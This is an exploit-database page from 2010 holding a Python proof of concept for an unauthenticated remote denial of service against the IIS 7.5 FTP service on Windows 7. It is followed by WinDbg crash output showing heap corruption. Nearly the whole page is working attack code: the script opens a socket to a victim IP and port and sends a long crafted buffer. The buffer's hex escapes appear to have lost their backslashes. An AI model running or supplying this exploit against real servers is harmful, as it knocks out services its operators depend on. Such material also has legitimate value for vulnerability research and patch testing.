[dos / poc] - Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote D
Posted on 21 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC by Matthew Bergin in dos / poc | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================== Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC =============================================== import socket, sys print " " print "----------------------------------------------------------------" print "| Windows 7 IIS7.5 FTPSVC UNAUTH'D REMOTE DOS POC |" print "| Matthew Bergin, Bergin Penetration Testing |" print "| Win7 Ultimate v6.1 build 7600, IIS 7.5.7600.16385 |" print "----------------------------------------------------------------" print " " buf=("xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xef" "x83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83" "xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0xefx83xb0" "xefx83xb0xefx83xb0x31x34x34x39x38xefxbbxbfxffxef" "xfexffxffxefxffxefxffxefxefxbbxbfxfexffxffxefxef" "xbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxefxbbxbfxff" "xefxffxefxffxefxffxefxfexffxefxbbxbfxffxefxefxbb" "xbfxffxefxefxbbxbfxefxbbxbfxefxbbxbfxffxefxfexff" "xffxefxefxbbxbfxefxbbxbfxfexffxffxefxffxefxfexff" "xffxefxfexffxfexffxefxbbxbfxffxefxfexffxffxefxff" "xefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxffxef" "xfexffxffxefxffxefxffxefxffxefxefxbbxbfxfexffxef" "xbbxbfxefxbbxbfxffxefxffxefxffxefxffxefxffxefxfe" "xffxfexffxfexffxfexffxefxbbxbfxffxefxefxbbxbfxff" "xefxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxef" "xefxbbxbfxfexffxfexffxffxefxffxefxfexffxfexffxef" "xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxffxef" "xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxffxef" "xefxbbxbfxefxbbxbfxffxefxefxbbxbfxefxbbxbfxefxbb" "xbfxefxbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxffxef" "xffxefxefxbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxfe" "xffxefxbbxbfxefxbbxbfxfexffxefxbbxbfxefxbbxbfxfe" "xffxfexffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxfexff" "xffxefxefxbbxbfxefxbbxbfxffxefxffxefxfexffxffxef" "xffxefxfexffxffxefxfexffxefxbbxbfxefxbbxbfxefxbb" "xbfxefxbbxbfxffxefxffxefxfexffxfexffxefxbbxbfxff" "xefxfexffxfexffxffxefxefxbbxbfxfexffxfexffxefxbb" "xbfxffxefxefxbbxbfxffxefxfexffxefxbbxbfxfexffxef" "xbbxbfxfexffxffxefxfexffxffxefxfexffxfexffxefxbb" "xbfxffxefxffxefxfexffxefxbbxbfxffxefxefxbbxbfxef" "xbbxbfxffxefxfexffxffxefxffxefxfexffxfexffxfexff" "xfexffxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxfe" "xffxffxefxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbb" "xbfxefxbbxbfxfexffxfexffxffxefxefxbbxbfxffxefxff" "xefxefxbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxefxbb" "xbfxefxbbxbfxefxbbxbfxffxefxfexffxfexffxefxbbxbf" "xefxbbxbfxfexffxffxefxfexffxefxbbxbfxefxbbxbfxef" "xbbxbfxfexffxffxefxfexffxffxefxefxbbxbfxfexffxff" "xefxffxefxffxefxefxbbxbfxefxbbxbfxffxefxefxbbxbf" "xffxefxfexffxfexffxffxefxffxefxfexffxefxbbxbfxff" "xefxffxefxffxefxffxefxefxbbxbfxfexffxefxbbxbfxfe" "xffxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxfexff" "xefxbbxbfxffxefxffxefxefxbbxbfxffxefxefxbbxbfxef" "xbbxbfxfexffxefxbbxbfxffxefxfexffxefxbbxbfxffxef" "xffxefxfexffxfexffxffxefxffxefxefxbbxbfxfexffxff" "xefxefxbbxbf" "xffxefxffxefxffxefxfexffxfexffxefxbbxbfxffxefxef" "xbbxbfxffxefxefxbbxbfxffxefxfexffxffxefxefxbbxbf" "xefxbbxbfxefxbbxbfxffxefxfexffxfexffxffxefxfexff" "xfexffxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxef" "xbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxfexffxffxef" "xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexff" "xfexffxffxefxfexffxefxbbxbfxffxefxffxefxfexffxff" "xefxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxff" "xefxffxefxefxbbxbfxfexffxfexffxffxefxffxefxffxef" "xfexffxefxbbxbfxefxbbxbfxffxefxffxefxfexffxffxef" "xffxefxfexffxffxefxfexffxfexffxfexffxffxefxfexff" "xfexffxffxefxefxbbxbfxefxbbxbfxfexffxffxefxefxbb" "xbfxffxefxfexffxefxbbxbfxffxefxffxefxefxbbxbfxff" "xefxfexffxfexffxefxbbxbfxefxbbxbfxefxbbxbfxffxef" "xefxbbxbfxffxefxefxbbxbfxffxefxfexffxfexffxffxef" "xffxefxefxbbxbfxffxefxefxbbxbfxfexffxfexffxefxbb" "xbfxfexffxfexffxfexffxfexffxffxefxefxbbxbfxefxbb" "xbfxffxefxfexffxfexffxfexffxefxbbxbfxefxbbxbfxef" "xbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxffxefxfexff" "xffxefxfexffxefxbbxbfxfexffxfexffxfexffxefxbbxbf" "xffxefxffxefxefxbbxbfxffxefxffxefxfexffxffxefxfe" "xffxefxbbxbfxffxefxefxbbxbfxefxbbxbfxefxbbxbfxef" "xbbxbfxefxbbxbfxfexffxefxbbxbfxffxefxffxefxfexff" "xffxefxfexffxfexffxfexffxfexffxfexffxefxbbxbfxfe" "xffxfexffxfexffxefxbbxbfxfexffxffxefxffxefxefxbb" "xbfxfexffxfexffxffxefxefxbbxbfxefxbbxbfxffxefxff" "xefxffxefxefxbbxbfxffxefxefxbbxbfxffxefxffxefxfe" "xffxffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxff" "xefxffxefxffxefxfexffxefxbbxbfxefxbbxbfxefxbbxbf" "xfexffxffxefxfexffxfexffxefxbbxbfxffxefxfexffxfe" "xffxffxefxefxbbxbfxffxefxffxefxfexffxfexffxfexff" "xffxefxffxefxffxefxfexffxefxbbxbfxefxbbxbfxffxef" "xfexffxffxefxfexffxffxefxfexffxfexffxfexffxffxef" "xfexffxffxefxfexffxffxefxefxbbxbfxefxbbxbfxffxef" "xffxefxffxefxfexffxffxefxfexffxfexffxffxefxfexff" "xefxbbxbfxfexffxefxbbxbfxefxbbxbfxfexffxefxbbxbf" "xffxefxefxbbxbfxffxefxfexffxfexffxfexffxefxbbxbf" "xfexffxefxbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxfe" "xffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxfexff" "xffxefxfexffxffxefxfexffxfexffxffxefxefxbbxbfxef" "xbbxbfxfexffxffxefxefxbbxbfxfexffxfexffxfexffxfe" "xffxfexffxffxefxffxefxffxefxfexffxfexffxefxbbxbf" "xffxefxfexffxfexffxefxbbxbfxffxefxfexffxefxbbxbf" "xffxefxffxefxefxbbxbfxefxbbxbfxffxefxffxefxffxef" "xefxbbxbfxffxefxfexffxffxefxfexffxefxbbxbfxefxbb" "xbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbf" "xfexffxefxbbxbfxffxefxffxefxfexffxffxefxefxbbxbf" "xefxbbxbfxefxbbxbfxffxefxfexffxfexffxffxefxefxbb" "xbfxefxbbxbfxfexffxffxefxefxbbxbfxfexffxfexffxfe" "xffxefxbbxbfxffxefxfexffxfexffxffxefxefxbbxbfxef" "xbbxbfxffxefxfexffxffxefxffxefxffxefxffxefxefxbb" "xbfxffxefxefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxef" "xefxbbxbfxfexffxffxefxffxefxffxefxefxbbxbfxefxbb" "xbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexffxef" "xbbxbfxfexffxfexffxfexffxffxefxefxbbxbfxfexffxef" "xbbxbfxfexffxfexffxefxbbxbfxefxbbxbfxffxefxefxbb" "xbfxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbfxefxbb" "xbfxfexffxffxefxffxefxfexffxfexffxfexffxfexffxef" "xbbxbfxffxefxffxefxfexffxffxefxefxbbxbfxefxbbxbf" "xefxbbxbfxffxefxfexffxefxbbxbfxffxefxefxbbxbfxff" "xefxffxefxfexffxefxbbxbfxffxefxfexffxfexffxefxbb" "xbfxffxefxefxbbxbfxffxefxfexffxfexffxffxefxffxef" "xefxbbxbfxfexffxefxbbxbfxffxefxffxefxfexffxefxbb" "xbfxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxefxbb" "xbfxffxefxefxbbxbfxfexffxefxbbxbfxfexffxffxefxfe" "xffxefxbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxefxbb" "xbfxffxefxfexffxfexffxffxefxfexffxefxbbxbfxffxef" "xfexffxefxbbxbfxfexffxffxefxffxefxfexffxffxefxef" "xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexff" "xefxbbxbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxfexff" "xefxbbxbfxefxbbxbfxfexffxffxefxffxefxfexffxfexff" "xefxbbxbfxfexffxfexffxfexffxfexffxfexffxfexffxff" "xefxfexffxffxefxffxefxffxefxffxefxfexffxfexffxef" "xbbxbfxffxefxffxefxefxbbxbfxffxefxefxbbxbfxffxef" "xfexffxefxbbxbfxffxefxfexffxffxefxefxbbxbfxffxef" "xefxbbxbfxefxbbxbfxffxefxfexffxefxbbxbfxefxbbxbf" "xefxbbxbfxfexffxefxbbxbfxfexffxffxefxefxbbxbfxef" "xbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbb" "xbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfe" "xffxfexffxffxefxfexffxefxbbxbfxefxbbxbfxfexffxff" "xefxffxefxefxbbxbfxefxbbxbfxefxbbxbfxfexffxefxbb" "xbfxfexffxefxbbxbfxefxbbxbfxefxbbxbfxfexffxefxbb" "xbfxfexffxefxbbxbfxffxefxfexffxefxbbxbfxffxefxff" "xefxfexffxfexffxfexffxefxbbxbfxfexffxefxbbxbfxfe" "xffxffxefxfexffxfexffxffxefxffxefxfexffxffxefxff" "xefxefxbbxbfxefxbbxbfxefxbbxbfxfexffxffxefxefxbb" "xbfxffxefxfexffxffxefxfexffxefxbbxbfxefxbbxbfxff" "xefxefxbbxbfxfexffxffxefxffxefxffxefxffxefxffxef" "xfexffxefxbbxbfxfexffxffxefxffxefxffxefxfexffxef" "xbbxbfxffxefxfexffxfexffxefxbbxbfxffxefxfexffxef" "xbbxbfxfexffxffxefxfexffxefxbbxbfxefxbbxbfxfexff" "xffxefxffxef" "xffxefxefxbbxbfxefxbbxbfxfexffxefxbbxbfxefxbbxbf" "xffxefxefxbbxbfxefxbbxbfxfexffxefxbbxbfxfexffxef" "xbbxbfxefxbbxbfxfexffxffxefxefxbbxbfxefxbbxbfxff" "xefxffxefxfexffxffxefxefxbbxbfxffxefxefxbbxbfxff" "xefxffxefxffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbb" "xbfxffxefxffxefxfexffxfexffxfexffxfexffxffxefxfe" "xffxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxfexff" "xffxefxffxefxffxefxefxbbxbfxefxbbxbfxffxefxffxef" "xffxefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxffxefxef" "xbbxbfxefxbbxbfxfexffxefxbbxbfxffxefxefxbbxbfxef" "xbbxbfxffxefxefxbbxbfxfexffxefxbbxbfxefxbbxbfxfe" "xffxefxbbxbfxefxbbxbfxefxbbxbfxffxefxffxefxefxbb" "xbfxefxbbxbfxefxbbxbfxffxefxfexffxfexffxfexffxfe" "xffxfexffxffxefxffxefxffxefxefxbbxbfxefxbbxbfxff" "xefxefxbbxbfxffxefxfexffxefxbbxbfxffxefxfexffxff" "xefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxfexffxfe" "xffxefxbbxbfxfexffxffxefxfexffxefxbbxbfxffxefxff" "xefxefxbbxbfxffxefxefxbbxbfxfexffxffxefxffxefxff" "xefxefxbbxbfxefxbbxbfxffxefxefxbbxbfxffxefxffxef" "xefxbbxbfxfexffxffxefxefxbbxbfxfexffxffxefxefxbb" "xbfxefxbbxbfxffxefxefxbbxbfxffxefxfexffxefxbbxbf" "xefxbbxbfxffxefxefxbbxbfxefxbbxbfxffxefxefxbbxbf" "xffxefxefxbbxbfxefxbbxbfxefxbbxbfxefxbbxbfxefxbb" "xbfxfexffxffxefxfexffxefxbbxbfxfexffxffxefxffxef" "xffxefxffxefxefxbbxbfxfexffxffxefxefxbbxbfxffxef" "xfexffxefxbbxbfxfexffxefxbbxbfxefxbbxbfxefxbbxbf") def usage(): print "usage : ./msiis7ftp.py <victim_ip> <victim_port>" print "example: ./msiis7ftp.py 192.168.1.22 21" def main(): if len(sys.argv) != 3: usage() sys.exit() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = sys.argv[1] PORT = int(sys.argv[2]) s.connect((HOST,PORT)) data = s.recv(1024) print data print "[*] Sending Payload... " s.send(buf+' ') print "[*] Closing Socket... " s.close() if __name__ == "__main__": main() ------------------------------------------------------------------------------ ModLoad: 75500000 75516000 C:Windowssystem32CRYPTSP.dll ModLoad: 752a0000 752db000 C:Windowssystem32 saenh.dll ModLoad: 72090000 720be000 C:Windowssystem32mlang.dll ModLoad: 75090000 7509b000 C:Windowssystem32pcwum.DLL ModLoad: 75a70000 75a7e000 C:Windowssystem32RpcRtRemote.dll (22c.c10): Break instruction exception - code 80000003 (first chance) eax=7ffaf000 ebx=00000000 ecx=00000000 edx=779cd315 esi=00000000 edi=00000000 eip=77963574 esp=00ccfc38 ebp=00ccfc64 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WindowsSYSTEM32 tdll.dll - ntdll!DbgBreakPoint: 77963574 cc int 3 0:012> g (22c.31c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0000003c ecx=0050291c edx=0000003b esi=005e5fc0 edi=00500000 eip=77986167 esp=00abf6b4 ebp=00abf794 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlPrefixUnicodeString+0x84c: 77986167 8b4814 mov ecx,dword ptr [eax+14h] ds:0023:00000014=???????? 0:006> g (22c.31c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=005e5fc8 ebx=005e7fc8 ecx=b083ef27 edx=efb083ef esi=005e5fc0 edi=00500000 eip=77986030 esp=00abf674 ebp=00abf69c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlPrefixUnicodeString+0x715: 77986030 8b4904 mov ecx,dword ptr [ecx+4] ds:0023:b083ef2b=???????? 0:006> g Critical error detected c0000374 (22c.31c): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520 eip=779f28e5 esp=00abe9fc ebp=00abea74 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 ntdll!RtlpNtMakeTemporaryKey+0x1a49: 779f28e5 cc int 3 0:006> g (22c.31c): Unknown exception - code c0000374 (first chance) (22c.31c): Unknown exception - code c0000374 (!!! second chance !!!) eax=00abea0c ebx=00000000 ecx=77950805 edx=00abe7a9 esi=00500000 edi=00515520 eip=779f2913 esp=00abe9fc ebp=00abea74 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!RtlpNtMakeTemporaryKey+0x1a77: 779f2913 eb12 jmp ntdll!RtlpNtMakeTemporaryKey+0x1a8b (779f2927) 0:006> g WARNING: Continuing a non-continuable exception (22c.31c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000 eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlTimeFieldsToTime+0x1d7: 7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? 0:006> g (22c.31c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000 eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlTimeFieldsToTime+0x1d7: 7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? 0:006> g (22c.31c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000 eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 